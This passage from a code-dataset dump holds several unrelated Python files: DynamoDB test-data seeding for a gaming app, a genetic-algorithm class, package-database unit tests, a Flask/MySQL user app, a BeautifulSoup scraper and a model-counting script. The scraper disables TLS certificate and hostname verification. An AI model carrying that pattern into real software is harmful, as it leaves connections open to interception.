'platform_name': 'Xbox Live',\n 'handle_name': 'test1_Xbox'\n },\n {\n 'handle_type': 'GAMING',\n 'platform_name': 'Playstation Network',\n 'handle_name': 'test1_PSN'\n }\n ]\n handles2 = [\n {\n 'handle_type': 'SOCIAL',\n 'platform_name': 'Facebook',\n 'handle_name': 'test2_FB'\n },\n {\n 'handle_type': 'SOCIAL',\n 
'platform_name': 'Twitter',\n 'handle_name': 'test2_Tweet'\n },\n {\n 'handle_type': 'GAMING',\n 'platform_name': 'Xbox Live',\n 'handle_name': 'test2_Xbox'\n },\n {\n 'handle_type': 'GAMING',\n 'platform_name': 'Steam',\n 'handle_name': 'test2_Steam'\n }\n ]\n handles3 = [\n {\n 'handle_type': 'SOCIAL',\n 'platform_name': 'Facebook',\n 'handle_name': 'test3_FB'\n },\n {\n 'handle_type': 'SOCIAL',\n 'platform_name': 'Twitter',\n 'handle_name': 'test3_Tweet'\n },\n {\n 'handle_type': 'GAMING',\n 'platform_name': 'Steam',\n 'handle_name': 'test3_Steam'\n },\n {\n 'handle_type': 'GAMING',\n 'platform_name': 'Playstation Network',\n 'handle_name': 'test1_PSN'\n }\n ]\n handles4 = [\n {\n 'handle_type': 'SOCIAL',\n 'platform_name': 'Facebook',\n 'handle_name': 'test4_FB'\n },\n {\n 'handle_type': 'SOCIAL',\n 'platform_name': 'Twitter',\n 'handle_name': 'test4_Tweet'\n },\n {\n 'handle_type': 'GAMING',\n 'platform_name': 'Xbox Live',\n 'handle_name': 'test4_Xbox'\n },\n {\n 'handle_type': 'GAMING',\n 'platform_name': 'Steam',\n 'handle_name': 'test4_Steam'\n }\n ]\n handles5 = [\n {\n 'handle_type': 'SOCIAL',\n 'platform_name': 'Facebook',\n 'handle_name': 'test5_FB'\n },\n {\n 'handle_type': 'SOCIAL',\n 'platform_name': 'Twitter',\n 'handle_name': 'test5_Tweet'\n },\n {\n 'handle_type': 'GAMING',\n 'platform_name': 'Steam',\n 'handle_name': 'test5_Steam'\n },\n {\n 'handle_type': 'GAMING',\n 'platform_name': 'Playstation Network',\n 'handle_name': 'test5_PSN'\n }\n ]\n\n user1Handles = usersTable.update_item(\n Key={\n 'uid': 'test-user-1',\n 'username': 'test_user1'\n },\n UpdateExpression='set handles = list_append(handles, :h)',\n ExpressionAttributeValues={\n ':h': handles1\n },\n ReturnValues='ALL_NEW'\n )\n\n user2Handles = usersTable.update_item(\n Key={\n 'uid': 'test-user-2',\n 'username': 'test_user2'\n },\n UpdateExpression='set handles = list_append(handles, :h)',\n ExpressionAttributeValues={\n ':h': handles2\n },\n ReturnValues='ALL_NEW'\n )\n\n user3Handles = usersTable.update_item(\n Key={\n 'uid': 'test-user-3',\n 'username': 'test_user3'\n },\n UpdateExpression='set handles = list_append(handles, :h)',\n ExpressionAttributeValues={\n ':h': handles3\n },\n ReturnValues='ALL_NEW'\n )\n\n user4Handles = usersTable.update_item(\n Key={\n 'uid': 'test-user-4',\n 'username': 'test_user4'\n },\n UpdateExpression='set handles = list_append(handles, :h)',\n ExpressionAttributeValues={\n ':h': handles4\n },\n ReturnValues='ALL_NEW'\n )\n\n user5Handles = usersTable.update_item(\n Key={\n 'uid': 'test-user-5',\n 'username': 'test_user5'\n },\n UpdateExpression='set handles = list_append(handles, :h)',\n ExpressionAttributeValues={\n ':h': handles5\n },\n ReturnValues='ALL_NEW'\n )\n\n # Give users privacy settings\n print(\"===== Give users privacy settings =====\")\n privacy1Games = [\n {\n 'platform_name': 'Xbox Live',\n 'visible_to': 'FRIENDS'\n },\n {\n 'platform_name': 'Playstation Network',\n 'visible_to': 'ALL'\n }\n ]\n privacy2Games = [\n {\n 'platform_name': 'Xbox Live',\n 'visible_to': 'NONE'\n },\n {\n 'platform_name': 'Steam',\n 'visible_to': 'ALL'\n }\n ]\n privacy3Games = [\n {\n 'platform_name': 'Steam',\n 'visible_to': 'FRIENDS'\n },\n {\n 'platform_name': 'Playstation Network',\n 'visible_to': 'NONE'\n }\n ]\n privacy4Games = [\n {\n 'platform_name': 'Xbox Live',\n 'visible_to': 'FRIENDS'\n },\n {\n 'platform_name': 'Steam',\n 'visible_to': 'ALL'\n }\n ]\n privacy5Games = [\n {\n 'platform_name': 'Steam',\n 'visible_to': 'ALL'\n },\n {\n 'platform_name': 'Playstation 
Network',\n 'visible_to': 'ALL'\n }\n ]\n privacy1Social = [\n {\n 'platform_name': 'Facebook',\n 'visible_to': 'FRIENDS'\n },\n {\n 'platform_name': 'Twitter',\n 'visible_to': 'ALL'\n }\n ]\n\n user1PrivacyGame = usersTable.update_item(\n Key={\n 'uid': 'test-user-1',\n 'username': 'test_user1'\n },\n UpdateExpression='set privacy_settings = list_append(privacy_settings, :p)',\n ExpressionAttributeValues={\n ':p': privacy1Games,\n },\n ReturnValues='ALL_NEW'\n )\n\n user1PrivacySocial = usersTable.update_item(\n Key={\n 'uid': 'test-user-1',\n 'username': 'test_user1'\n },\n UpdateExpression='set privacy_settings = list_append(privacy_settings, :s)',\n ExpressionAttributeValues={\n ':s': privacy1Social\n },\n ReturnValues='ALL_NEW'\n )\n\n user2PrivacyGame = usersTable.update_item(\n Key={\n 'uid': 'test-user-2',\n 'username': 'test_user2'\n },\n UpdateExpression='set privacy_settings = list_append(privacy_settings, :p)',\n ExpressionAttributeValues={\n ':p': privacy2Games,\n },\n ReturnValues='ALL_NEW'\n )\n\n user2PrivacySocial = usersTable.update_item(\n Key={\n 'uid': 'test-user-2',\n 'username': 'test_user2'\n },\n UpdateExpression='set privacy_settings = list_append(privacy_settings, :s)',\n ExpressionAttributeValues={\n ':s': privacy1Social\n },\n ReturnValues='ALL_NEW'\n )\n\n user3PrivacyGame = usersTable.update_item(\n Key={\n 'uid': 'test-user-3',\n 'username': 'test_user3'\n },\n UpdateExpression='set privacy_settings = list_append(privacy_settings, :p)',\n ExpressionAttributeValues={\n ':p': privacy3Games,\n },\n ReturnValues='ALL_NEW'\n )\n\n user3PrivacySocial = usersTable.update_item(\n Key={\n 'uid': 'test-user-3',\n 'username': 'test_user3'\n },\n UpdateExpression='set privacy_settings = list_append(privacy_settings, :s)',\n ExpressionAttributeValues={\n ':s': privacy1Social\n },\n ReturnValues='ALL_NEW'\n )\n\n user4PrivacyGame = usersTable.update_item(\n Key={\n 'uid': 'test-user-4',\n 'username': 'test_user4'\n },\n UpdateExpression='set privacy_settings = list_append(privacy_settings, :p)',\n ExpressionAttributeValues={\n ':p': privacy4Games,\n },\n ReturnValues='ALL_NEW'\n )\n\n user4PrivacySocial = usersTable.update_item(\n Key={\n 'uid': 'test-user-4',\n 'username': 'test_user4'\n },\n UpdateExpression='set privacy_settings = list_append(privacy_settings, :s)',\n ExpressionAttributeValues={\n ':s': privacy1Social\n },\n ReturnValues='ALL_NEW'\n )\n\n user5PrivacyGame = usersTable.update_item(\n Key={\n 'uid': 'test-user-5',\n 'username': 'test_user5'\n },\n UpdateExpression='set privacy_settings = list_append(privacy_settings, :p)',\n ExpressionAttributeValues={\n ':p': privacy5Games,\n },\n ReturnValues='ALL_NEW'\n )\n\n user5PrivacySocial = usersTable.update_item(\n Key={\n 'uid': 'test-user-5',\n 'username': 'test_user5'\n },\n UpdateExpression='set privacy_settings = list_append(privacy_settings, :s)',\n ExpressionAttributeValues={\n ':s': privacy1Social\n },\n ReturnValues='ALL_NEW'\n )\n\n # Update followed games\n print(\"===== Update followed games =====\")\n user1Games = [\n {\n 'game_id': h3Id,\n 'game_name': h3Name\n },\n {\n 'game_id': rsId,\n 'game_name': rsName\n }\n ]\n user2Games = [\n {\n 'game_id': h3Id,\n 'game_name': h3Name\n },\n {\n 'game_id': sc2Id,\n 'game_name': sc2Name\n }\n ]\n user3Games = [\n {\n 'game_id': sc2Id,\n 'game_name': sc2Name\n },\n {\n 'game_id': rsId,\n 'game_name': rsName\n }\n ]\n user4Games = [\n {\n 'game_id': sc2Id,\n 'game_name': sc2Name\n },\n {\n 'game_id': rsId,\n 'game_name': rsName\n }\n ]\n user5Games = [\n {\n 
'game_id': rsId,\n 'game_name': rsName\n }\n ]\n\n h3Followers = [\n {\n 'uid': 'test-user-1',\n 'username': 'test_user1'\n },\n {\n 'uid': 'test-user-2',\n 'username': 'test_user2'\n }\n ]\n sc2Followers = [\n {\n 'uid': 'test-user-2',\n 'username': 'test_user2'\n },\n {\n 'uid': 'test-user-3',\n 'username': 'test_user3'\n },\n {\n 'uid': 'test-user-4',\n 'username': 'test_user4'\n }\n ]\n rsFollowers = [\n {\n 'uid': 'test-user-1',\n 'username': 'test_user1'\n },\n {\n 'uid': 'test-user-3',\n 'username': 'test_user3'\n },\n {\n 'uid': 'test-user-4',\n 'username': 'test_user4'\n },\n {\n 'uid': 'test-user-5',\n 'username': 'test_user5'\n }\n ]\n\n user1GamesUpdate = usersTable.update_item(\n Key={\n 'uid': 'test-user-1',\n 'username': 'test_user1'\n },\n UpdateExpression='set followed_games = \\\n list_append(followed_games, :g)',\n ExpressionAttributeValues={\n ':g': user1Games\n },\n ReturnValues='ALL_NEW'\n )\n user2GamesUpdate = usersTable.update_item(\n Key={\n 'uid': 'test-user-2',\n 'username': 'test_user2'\n },\n UpdateExpression='set followed_games = \\\n list_append(followed_games, :g)',\n ExpressionAttributeValues={\n ':g': user2Games\n },\n ReturnValues='ALL_NEW'\n )\n user3GamesUpdate = usersTable.update_item(\n Key={\n 'uid': 'test-user-3',\n 'username': 'test_user3'\n },\n UpdateExpression='set followed_games = \\\n list_append(followed_games, :g)',\n ExpressionAttributeValues={\n ':g': user3Games\n },\n ReturnValues='ALL_NEW'\n )\n user4GamesUpdate = usersTable.update_item(\n Key={\n 'uid': 'test-user-4',\n 'username': 'test_user4'\n },\n UpdateExpression='set followed_games = \\\n list_append(followed_games, :g)',\n ExpressionAttributeValues={\n ':g': user4Games\n },\n ReturnValues='ALL_NEW'\n )\n user5GamesUpdate = usersTable.update_item(\n Key={\n 'uid': 'test-user-5',\n 'username': 'test_user5'\n },\n UpdateExpression='set followed_games = \\\n list_append(followed_games, :g)',\n ExpressionAttributeValues={\n ':g': user5Games\n },\n ReturnValues='ALL_NEW'\n )\n\n h3Update = gamesTable.update_item(\n Key={\n 'game_id': h3Id,\n 'name': h3Name\n },\n UpdateExpression='set followers = list_append(followers, :f)',\n ExpressionAttributeValues={\n ':f': h3Followers\n },\n ReturnValues='ALL_NEW'\n )\n sc2Update = gamesTable.update_item(\n Key={\n 'game_id': sc2Id,\n 'name': sc2Name\n },\n UpdateExpression='set followers = list_append(followers, :f)',\n ExpressionAttributeValues={\n ':f': sc2Followers\n },\n ReturnValues='ALL_NEW'\n )\n rsUpdate = gamesTable.update_item(\n Key={\n 'game_id': rsId,\n 'name': rsName\n },\n UpdateExpression='set followers = list_append(followers, :f)',\n ExpressionAttributeValues={\n ':f': rsFollowers\n },\n ReturnValues='ALL_NEW'\n )\n\n print(\"END RootApp.populateDynamoDB()\")\n\n def build(self):\n \"\"\"\n build() is called whenever this program is ran. It checks if there is a database file in its working directory,\n if not it calls initDynamoDB() and populateDynamoDB(). 
Finally it instantiates RootManager and returns it.\n :return: An instance of RootManager\n \"\"\"\n # check if .db file exists, if not create it\n if not os.path.isfile(dbFileWin) and not os.path.isfile(dbFileLin) and not os.path.isfile(dbFileWin10):\n self.initDynamoDB()\n self.populateDynamoDB()\n\n # set the screen size (Just for testing purposes)\n Window.size = (400, 600)\n # Config.set('graphics', 'width', '200')\n # Config.set('graphics', 'height', '400')\n\n # instantiate RootManager() and use it as the root widget of the app\n r = RootManager()\n self.root = r\n return r\n\n\nif __name__ == '__main__':\n RootApp().run()\n","sub_path":"root.py","file_name":"root.py","file_ext":"py","file_size_in_byte":66362,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"293781975","text":"from Square import *\n\n\nclass Population:\n def __init__(self):\n self.squares = []\n for i in range(pop_size):\n s = Square()\n self.squares.append(s)\n all_sprites.add(s)\n pop_sprites.add(s)\n self.total_fitness = 0.0\n self.generation = 1\n self.best_square_dir = []\n self.best_square = Square\n\n def boost_fitness(self):\n best_steps = self.best_square.curr_step\n fixed_direction = best_steps\n new_squares = []\n for i in range(pop_size):\n if i < 50: # for the first 50 keep evolving normally\n baby = self.select_parent().get_baby()\n new_squares.append(baby)\n elif best_steps < n_steps and not self.best_square.has_reached_goal: # the best crushed somewhere\n baby = Square()\n if i < pop_size / 2:\n explosion = 50\n else:\n explosion = 15\n for j in range(fixed_direction - explosion):\n baby.dir[j] = self.best_square_dir[j]\n new_squares.append(baby)\n baby.add(all_sprites)\n baby.add(pop_sprites)\n else:\n baby = Square()\n remainder = i % 50\n if remainder == 0:\n fixed_direction -= 15\n baby.dir = cardinal_dir[remainder].copy()\n elif remainder < 4:\n baby.dir = cardinal_dir[remainder].copy()\n for j in range(fixed_direction):\n baby.dir[j] = self.best_square_dir[j]\n new_squares.append(baby)\n baby.add(all_sprites)\n baby.add(pop_sprites)\n self.squares = new_squares.copy()\n self.keep_best()\n self.generation += 1\n\n def compute_total_fitness(self):\n self.total_fitness = 0.0\n fittest = 0.0\n for square in self.squares:\n square.compute_fitness()\n if fittest < square.fitness:\n fittest = square.fitness\n self.best_square = square\n self.best_square_dir = square.dir.copy()\n self.total_fitness += square.fitness\n square.kill()\n\n def natural_selection(self):\n new_squares = []\n for i in range(0, pop_size):\n baby = self.select_parent().get_baby()\n new_squares.append(baby)\n self.squares = new_squares.copy()\n self.keep_best()\n self.generation += 1\n\n def select_parent(self):\n avg = self.total_fitness / pop_size\n rand = random.uniform(0.0, self.total_fitness)\n curr_sum = 0.0\n for square in self.squares:\n curr_sum += square.fitness\n if square.fitness > avg and curr_sum > rand:\n return square\n best = Square()\n best.dir = self.best_square_dir.copy()\n return best\n\n def keep_best(self):\n best = self.squares[0]\n best.dir = self.best_square_dir.copy()\n best.is_best = True\n best.image = pygame.Surface((square_side * 3, square_side * 3))\n best.image.fill(MAGENTA)\n","sub_path":"Population.py","file_name":"Population.py","file_ext":"py","file_size_in_byte":3208,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"210881930","text":"#!/usr/bin/env python3\nimport json\nimport 
os\nimport textwrap\nimport unittest\n\nfrom fs_image.common import nullcontext\nfrom fs_image.fs_utils import temp_dir\nfrom fs_image import update_package_db as updb\n\n_GENERATED = updb._GENERATED\n\n\nclass UpdatePackageDbTestCase(unittest.TestCase):\n\n def _check_file(self, path, content):\n with open(path) as infile:\n self.assertEqual(content, infile.read())\n\n def test_temp_file_error(self):\n with temp_dir() as td:\n path = td / 'dog'\n with open(path, 'w') as outfile:\n outfile.write('woof')\n with self.assertRaisesRegex(RuntimeError, '^woops$'):\n with updb._populate_temp_file_and_rename(path) as outfile:\n outfile.write('meow')\n tmp_path = outfile.name\n raise RuntimeError('woops')\n # Potentially can race with another tempfile creation, but this\n # should be vanishingly unlikely.\n self.assertFalse(os.path.exists(tmp_path))\n # Importantly, the original file is untouched.\n self._check_file(td / 'dog', 'woof')\n\n def _write_bzl_db(self, db_path, dct):\n with open(db_path, 'w') as outfile:\n # Not using `_with_generated_header` to ensure that we are\n # resilient to changes in the header.\n outfile.write(f'# A {_GENERATED} file\\n# second header line\\n')\n outfile.write(updb._BZL_DB_PREFIX)\n json.dump(dct, outfile)\n # Make sure our write implementation is sane.\n self.assertEqual(dct, updb._read_bzl_db(db_path))\n\n def _main(self, argv):\n updb.main(\n argv,\n nullcontext(lambda _pkg, _tag, opts: opts if opts else {'x': 'z'}),\n how_to_generate='how',\n overview_doc='overview doc',\n options_doc='opts doc',\n )\n\n def test_default_update(self):\n with temp_dir() as td:\n db_path = td / 'db.bzl'\n self._write_bzl_db(db_path, {'pkg': {'tag': {'foo': 'bar'}}})\n self._main(['--db', db_path.decode()])\n self._check_file(db_path, '# ' + _GENERATED + textwrap.dedent(''' \\\n SignedSource<<69d45bae7b77e0bd2ee0d5a285d6fdb3>>\n # Update via `how`\n package_db = {\n \"pkg\": {\n \"tag\": {\n \"x\": \"z\",\n },\n },\n }\n '''))\n\n def test_explicit_update(self):\n with temp_dir() as td:\n db_path = td / 'db.bzl'\n self._write_bzl_db(db_path, {\n 'p1': {'tik': {'foo': 'bar'}}, # replaced\n 'p2': {'tok': {'a': 'b'}}, # preserved\n })\n self._main([\n '--db', db_path.decode(),\n '--replace', 'p1', 'tik', '{\"choo\": \"choo\"}',\n '--create', 'p2', 'tak', '{\"boo\": \"hoo\"}',\n '--create', 'never', 'seen', '{\"oompa\": \"loompa\"}',\n '--no-update-existing',\n ])\n self._check_file(db_path, '# ' + _GENERATED + textwrap.dedent(''' \\\n SignedSource<<37820c384800aad6bf6ebe97f7e7c1a1>>\n # Update via `how`\n package_db = {\n \"never\": {\n \"seen\": {\n \"oompa\": \"loompa\",\n },\n },\n \"p1\": {\n \"tik\": {\n \"choo\": \"choo\",\n },\n },\n \"p2\": {\n \"tak\": {\n \"boo\": \"hoo\",\n },\n \"tok\": {\n \"a\": \"b\",\n },\n },\n }\n '''))\n\n def test_explicit_update_conflicts(self):\n with temp_dir() as td:\n db_path = td / 'db.bzl'\n self._write_bzl_db(db_path, {'p1': {'a': {}}, 'p2': {'b': {}}})\n with self.assertRaisesRegex(AssertionError, \"'p1', 'a'\"):\n self._main([\n '--db', db_path.decode(), '--create', 'p1', 'a', '{}',\n ])\n with self.assertRaisesRegex(AssertionError, \"'p2', 'c'\"):\n self._main([\n '--db', db_path.decode(), '--replace', 'p2', 'c', '{}',\n ])\n with self.assertRaisesRegex(RuntimeError, 'Conflicting \"replace\"'):\n self._main([\n '--db', db_path.decode(),\n '--replace', 'p2', 'b', '{}',\n '--replace', 'p2', 'b', '{}',\n ])\n\n def test_json_db(self):\n with temp_dir() as td:\n os.makedirs(td / 'idb/pkg')\n with open(td / 'idb/pkg/tag.json', 'w') as 
outfile:\n # Not using `_with_generated_header` to ensure that we are\n # resilient to changes in the header.\n outfile.write(f'# A {_GENERATED} file\\n# 2nd header line\\n')\n json.dump({'foo': 'bar'}, outfile)\n self.assertEqual(\n {'pkg': {'tag': {'foo': 'bar'}}},\n updb._read_json_dir_db(td / 'idb'),\n )\n self._main([\n '--db', (td / 'idb').decode(),\n '--out-db', (td / 'odb').decode(),\n ])\n self.assertEqual([b'pkg'], os.listdir(td / 'odb'))\n self.assertEqual([b'tag.json'], os.listdir(td / 'odb/pkg'))\n self._check_file(\n td / 'odb/pkg/tag.json',\n '# ' + _GENERATED + textwrap.dedent(''' \\\n SignedSource<>\n # Update via `how`\n {\n \"x\": \"z\"\n }\n '''))\n","sub_path":"fs_image/tests/test_update_package_db.py","file_name":"test_update_package_db.py","file_ext":"py","file_size_in_byte":5815,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"384541293","text":"class student:\r\n def __init__(self):\r\n self.name=input(\"Enter student name:\")\r\n self.rollno=int(input(\"Enter student rollno:\"))\r\n self.branch=input(\"Enter student branch:\")\r\n self.rank=int(input(\"Enter rank:\"))\r\n def display(self):\r\n print(\"NAME:\",self.name)\r\n print(\"ROLLNO:\",self.rollno)\r\n print(\"BRANCH:\",self.branch)\r\n print(\"RANK:\",self.rank)\r\nprint(\"Enter student1 details:\")\r\ns1=student()\r\ns1.display()\r\n\r\n\r\n\r\nprint(\"Enter student2 details:\")\r\ns2=student()\r\ns2.display()\r\n\r\n\r\n \r\n \r\n","sub_path":"__Python/__Class and Object/python OOPS material/python OOPS material/17 constructor student.py","file_name":"17 constructor student.py","file_ext":"py","file_size_in_byte":565,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"195920972","text":"import urllib.request, urllib.parse, urllib.error\nfrom bs4 import BeautifulSoup\nimport ssl\n\nctx = ssl.create_default_context()\nctx.check_hostname = False\nctx.verify_mode = ssl.CERT_NONE\n\nurl = input('Enter -')\nhtml = urllib.request.urlopen(url, context=ctx).read()\nsoup = BeautifulSoup(html, 'html.parser')\nsum = 0\ntags = soup('span')\nfor tag in tags:\n # Look at the parts of a tag\n print('TAG:',tag)\n print( 'URL:',tag.get('href', None))\n print( 'Contents:',tag.contents[0])\n print( 'Attrs:',tag.attrs)\n sum = sum + int(tag.contents[0])\nprint(sum) ","sub_path":"beatSoupAssignment.py","file_name":"beatSoupAssignment.py","file_ext":"py","file_size_in_byte":561,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"34126836","text":"from flask import Flask, render_template, request, redirect\nfrom mysqlconnection import connectToMySQL \napp = Flask(__name__)\n\n@app.route(\"/users/new\", methods=['GET'])\ndef index(): \n return render_template(\"index.html\")\n\n@app.route(\"/add_user\", methods=['POST'])\ndef create_user(): \n mysql = connectToMySQL('mydb')\n query = \"INSERT INTO users (first_name, last_name, email, created_at, updated_at) VALUES (%(f)s, %(l)s, %(e)s, NOW(), NOW());\"\n data = {\n \"f\" : request.form['first_name'],\n \"l\" : request.form['last_name'],\n \"e\" : request.form['email']\n } \n user_id = str(mysql.query_db(query, data))\n return redirect('/users/' + str(user_id)) \n\n@app.route(\"/users\")\ndef users():\n mysql = connectToMySQL('mydb')\n one_user = mysql.query_db(\"SELECT * FROM users\")\n # destroy = mysql.query_db(\"DELETE FROM users WHERE id=''\") \n return render_template('show.html', all_users = one_user)\n\n# , 
delete = destroy\n\n@app.route(\"/edit_user/<int:user_id>\")\ndef edit(user_id):\n mysql = connectToMySQL('mydb')\n # user_id = mysql.query_db() \n return redirect('/users/' + str(user_id) + '/edit.html')\n\n@app.route('/users/<int:user_id>')\ndef single_user(user_id):\n mysql = connectToMySQL('mydb')\n query = \"SELECT * FROM users WHERE id = %(i)s;\"\n data = {\n 'i' : user_id\n }\n one_user = mysql.query_db(query, data)\n return render_template('users.html', one_user = one_user)\n\nif __name__ == \"__main__\":\n app.run(debug=True)","sub_path":"Python projects/flask/flask_mysql/users copy/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1492,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"37834156","text":"import subprocess, os, sys\nimport time\nimport argparse\nfrom partition_random_sample import *\nimport math\n##########################################################\n### PSMC on a CNF file without Aiger circuit unrolling ###\n##########################################################\n\n###################\n##argument parser##\n###################\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"filename\", help = \"cnf file path\")\nparser.add_argument(\"-k\", \"--num_partition_variables\", help = \"number of partitioning variables\", type = int, default = -1)\nparser.add_argument(\"-eo\", \"--epsilon_original\", help = \"epsilon bound on original\", type = float, default = 2)\nparser.add_argument(\"-ep\", \"--epsilon_partition\", help = \"epsilon bound on answer with 99%% probability\", type = float, default = 2)\nparser.add_argument(\"-ad\", \"--original_delta\", help = \"the delta for the original\", type = float, default = .1)\nparser.add_argument(\"-pd\", \"--partition_delta\", help = \"the delta for the partitions\", type = float, default = .01)\nparser.add_argument(\"-ap\", \"--actual_probability\", help = \"don't calculate the exact probability; just use this number\", type = float, default = -1)\nparser.add_argument(\"--method\", action='store', choices=[\"3n/4\",\"n/2\", \"n-5\", \"nlogn\"], help='partitioning technique')\nparser.add_argument(\"--threshold\", help='number of iterations to convergence')\nparser.add_argument(\"--convergence_limit\", help='maximum density change between iterations that still counts towards convergence')\nparser.add_argument(\"--ignore_original\", help = \"do not run scalmc on the original model\", action = \"store_true\")\nparser.add_argument(\"--ignore_partition\", help = \"do not run scalmc on the partitions\", action = \"store_true\")\nargs = parser.parse_args()\nrun_on_partition = not args.ignore_partition\nrun_on_original = not args.ignore_original\nk = int(args.num_partition_variables)\nnum_clauses = 0\noriginal_count = 0\noriginal_time = 0\nn = 0\nfilename = args.filename\n\n##################################################################\n# Get the number of clauses and the number of counting variables #\n##################################################################\n\nsub_value = 0\nwith open(filename, 'r') as f:\n found = False\n file_lines = f.readlines()\n for i in range(len(file_lines)):\n x = file_lines[i]\n if \"c ind\" in x:\n n += len(x.split(' ')) - 3\n elif \"p cnf \" in x:\n num_clauses = int(x.split(' ')[-1])\n if n == 0:\n sub_value = int(x.split(' ')[-2])\nif n == 0:\n n = sub_value\nprint(\"File: \" + filename.split('/')[-1].split('.cnf')[0])\nprint(\"n = \" + str(n))\n\n#############################################\n# set the parameters appropriately # \n# pivotAC and epsilon for PSMC and original #\n#############################################
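\n\n# The pivot expression below appears to follow the ApproxMC-style threshold\n# pivot = ceil(9.84 * (1 + eps/(1+eps)) * (1 + 1/eps)^2); worked example for\n# the default eps = 2: 9.84 * (1 + 2/3) * 1.5**2 = 9.84 * 3.75 = 36.9 -> 37.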
\n\nepsilon_main = float(args.epsilon_original)\npivotAC_main = int(math.ceil(9.84 * (1 + (epsilon_main / (1.0 + epsilon_main))) * (1 + (1.0/epsilon_main)) * (1 + (1.0/epsilon_main))))\nepsilon_partition = float(args.epsilon_partition)\npivotAC_partition = int(math.ceil(9.84 * (1 + (epsilon_partition / (1.0 + epsilon_partition))) * (1 + (1.0/epsilon_partition)) * (1 + (1.0/epsilon_partition))))\n\ndelta_partition = float(args.partition_delta)\ndelta_original = float(args.original_delta)\n\n######################\n# SCALMC ON ORIGINAL #\n######################\n\nif run_on_original:\n ## count the solutions of the original formula\n start = time.time()\n info = os.popen(\"./../../maxcount/scalmc --pivotAC \" + str(pivotAC_main) + \" --delta \" + str(delta_original) + \" \" + filename).readlines()[-1]\n # info = os.popen(\"./../../maxcount/scalmc --pivotAC \" + str(pivotAC_main) + \" --delta .05 \" + filename).readlines()[-1]\n # info = os.popen(\"./../../maxcount/scalmc \" + filename).readlines()[-1]\n num_sols = info.split(': ')[1].split(' x ')\n base, exp = int(num_sols[1].split('^')[0]), int(num_sols[1].split('^')[1].strip(\"\\n\"))\n original_count += int(num_sols[0]) * base**exp\n end = time.time()\n original_time = end - start\n j = 0\n\n # write the count in the form a x 2^j (largest power of two factored out)\n while original_count % (2**(j+1)) == 0:\n j += 1\n original_count_str = str(original_count//(2**j)) + \" x 2^\" + str(j)\n # print(\"Original Probability: \" + str(float(original_count)/(2**n)))\n # print(\"epsilon for original = \" + str(epsilon_main))\n # print(\"Time for original: \" + str(original_time))\n # print(\"Original Count: \" + original_count_str)\n\n########################\n# SCALMC ON PARTITIONS #\n########################\nif run_on_partition:\n # if k (the number of partitioning variables) was never specified, calculate it according to the parameters of the cnf file\n if k == -1:\n if args.method == \"3n/4\":\n k = int(.75*n)\n elif args.method == \"n/2\":\n k = int(0.5*n)\n elif args.method == \"nlogn\":\n k = int(n - math.log(n, 2))\n else: \n k = n-5\n # print(\"Partitioning Technique: \" + str(args.method))\n # print(\"k = \" + str(k))\n\n # What should be the limit of convergence?\n convergence_limit = float(args.convergence_limit)\n # How many iterations where the density does not change by more than the convergence limit until we determine convergence?\n threshold = int(args.threshold)\n # How many free variables?\n free_vars = n - k\n # partition the file, time it\n start = time.time()\n variable_order = get_top_vars(k, 1000, filename)\n partition_vars = variable_order[:k]\n end = time.time()\n # overhead of choosing the partitioning variables\n file_gen_time = end - start\n\n # how many iterations have I gone through in which the density has not deviated more than convergence_limit (the max allowed)?\n \n density_counter = 0\n\n # how to calculate the average density: density_sum/partitions_sampled (partitions_sampled is for CURRENT VALUE OF K)\n \n density_sum = 0.0\n total_files = 0\n partitions_sampled = 0 \n density = 0\n\n # time the algorithm\n partition_time = 0\n start = time.time()\n converged = False\n\n # which partitions have I tested?\n partitions = set()\n\n \n empty_counter = 0 # how many empty partitions have I sampled?\n delta = 0.1\n level = 1 # the number of values k has taken on.\n i = 0\n min_k = int(math.log(n, 2))\n #find p\n # p = 0\n # lim = n\n # while lim > 0:\n # lim = lim - (2**p) * math.log(n, 2)\n # p += 1\n # p -= 1\n 
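# A minimal sketch (not in the original script) of the estimator the loop\n # below converges to; 'avg_density' and 'num_vars' are illustrative names.\n def _estimated_model_count(avg_density, num_vars):\n # each sampled partition fixes k variables, so its density is\n # (solutions found) / 2**(n - k); averaging those densities and scaling\n # by 2**num_vars mirrors 'partition_count = density * 2**n' below.\n return avg_density * (2 ** num_vars)\n\n 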
final_start_time = time.time()\n while not converged:\n\n # What is k (# of partitioning variables) currently at? It is the max of (min_k, decremented_k)\n # because the idea is to reduce k by decreasing by 2 * math.log(n, 2) until it reaches the minimum possible size\n # once you reach the minimum possible size, stop decreasing k.\n\n decremented_k = int(n - (2**(level-1))*math.log(n, 2))\n min_k = int(math.log(n, 2))\n # if we have sampled a sufficient # of empty partitions....\n # n/(2**(level - 1)) : each time we increase k, we decrease the amount of empty partitions before a reset by a factor of 2\n # until we cannot decrease it anymore (the floor is max(2, math.log(n, 2))).\n if empty_counter > max(n/(2**(level - 1)), math.log(n, 2), 2) and min_k < decremented_k:\n # then reduce k by dividing by 2, tweak epsilon by multiplying by 2, and adjust pivot_AC accordingly.\n # also reset the density measures: partitions_sampled, density, density_counter, density_sum.\n\n epsilon_partition = min(epsilon_partition * 2, 1.2)\n pivotAC_partition = int(math.ceil(9.84 * (1 + (epsilon_partition / (1.0 + epsilon_partition))) * (1 + (1.0/epsilon_partition)) * (1 + (1.0/epsilon_partition))))\n empty_counter = 0\n level += 1\n partitions = set()\n density_counter = 0\n density_sum = 0.0\n partitions_sampled = 0\n density = 0\n i = 0\n # p = max (p-1, 0)\n decremented_k = int(n - (2**(level-1))*math.log(n, 2))\n min_k = int(math.log(n, 2))\n if args.method == \"nlogn\":\n # k = 10\n k = max(min_k, decremented_k)\n else:\n k = max(k-10, 0)\n # print(\"k: \" + str(k))\n partition_vars = variable_order[:k]\n final_start_time = time.time()\n\n old_density = density\n assignment_str = \"\"\n generator = time.time()\n\n # generate a partition assignment that has not been sampled yet.\n while assignment_str in partitions or assignment_str == \"\":\n assignment_str = random_string_generator(k)\n if len(partitions) == 